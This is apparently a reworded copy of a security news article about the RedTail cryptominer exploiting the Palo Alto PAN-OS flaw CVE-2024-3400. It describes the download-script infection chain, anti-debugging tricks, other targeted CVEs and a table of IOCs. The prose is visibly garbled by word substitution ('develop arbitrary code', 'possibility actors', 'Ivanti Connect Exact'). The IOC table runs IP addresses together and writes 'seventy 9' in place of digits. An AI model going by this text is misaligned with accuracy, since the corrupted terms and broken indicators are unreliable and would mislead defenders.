RedTail Cryptominer Exploiting Palo Alto Networks Firewall Zero-day Flaw
The RedTail cryptocurrency mining malware has been observed exploiting a important zero-day vulnerability in Palo Alto Networks’ firewall system, PAN-OS.
This vulnerability, tracked as CVE-2024-3400, has a CVSS rating of 10.0, indicating its severity. The flaw permits unauthenticated attackers to develop arbitrary code with root privileges on the affected firewall systems, posing a substantial possibility to organizations relying on these gadgets for network safety.
The exploitation task begins with the attackers leveraging the CVE-2024-3400 vulnerability to catch unauthorized get entry to to the firewall.
Once get entry to is bought, the attackers develop instructions to retrieve and crawl a bash shell script from an exterior domain.
This script is to blame for downloading the RedTail payload, which is customized to the compromised machine’s CPU architecture.
The malware then initiates its cryptomining operations, utilizing the machine’s sources to mine cryptocurrency.
Improved Techniques and Evasion
The latest iteration of RedTail incorporates loads of evolved solutions to evade detection and diagnosis.
In step with Akamai’s safety researchers, the malware now entails unique anti-diagnosis aspects, corresponding to forking itself extra than one events to hinder debugging efforts and terminating any circumstances of the GNU Debugger (GDB) it encounters.
These enhancements invent it tougher for safety professionals to analyze and mitigate the possibility.
The malware’s configuration has additionally been up to this point to consist of an encrypted mining setup, which launches the embedded XMRig miner.
Particularly, the most fresh version of RedTail doesn’t private a cryptocurrency wallet, suggesting that the possibility actors possess shifted to the utilize of private mining pools or pool proxies.
This commerce permits them bigger modify over mining outcomes no matter the elevated operational and monetary charges of declaring a non-public server.
RedTail’s impact is no longer puny to Palo Alto Networks firewalls. The malware has additionally been observed exploiting other known vulnerabilities in diverse gadgets and system, including TP-Hyperlink routers (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Exact (CVE-2023-46805 and CVE-2024-21887), and VMWare Workspace ONE Earn entry to and Identity Supervisor (CVE-2022-22954).
This vary of targets highlights the malware’s versatility and the attackers’ intensive files of diverse systems.
RedTail changed into first documented in January 2024 by safety researcher Patryk Machowiak, who known its utilize in a campaign exploiting the Log4Shell vulnerability (CVE-2021-44228) to deploy the malware on Unix-based entirely systems.
Since then, the malware has evolved vastly. In March 2024, Barracuda Networks reported cyber attacks that leveraged flaws in SonicWall (CVE-2019-7481) and Visual Tools DVR (CVE-2021-42071) to put in Mirai botnet variants and deploy RedTail.
The latest version detected in April 2024 entails important updates, such because the utilize of the RandomX algorithm for bigger mining effectivity and modifications to the operating machine configuration to invent the most of better memory blocks (hugepages), bettering efficiency.
Whereas Akamai has no longer attributed the RedTail malware to any particular neighborhood, the sophistication, and sources required to characteristic a non-public cryptomining pool imply the involvement of a nation-reveal-backed neighborhood.
The solutions the possibility actors make utilize of replicate those outdated by North Korea’s Lazarus Community, known for its for-profit hacking operations and cryptocurrency thefts.
The exploitation of the CVE-2024-3400 vulnerability by the RedTail cryptominer underscores the considerable need for organizations to have a examine safety patches and updates promptly.
IOCs
Indicator form | Indicator price |
---|---|
Exploits starting up IP addresses | 92.118.39.120193.222.96.16379.110.62.2534.127.194.11192.18.157.25168.170.165.3694.74.75.19 |
Malware internet hosting servers | 193.222.96.16394.156.seventy 9.6094.156.seventy 9.129185.216.70.13878.153.140.51 |
Domains | proxies.identitynetwork.top |
Source credit : cybersecuritynews.com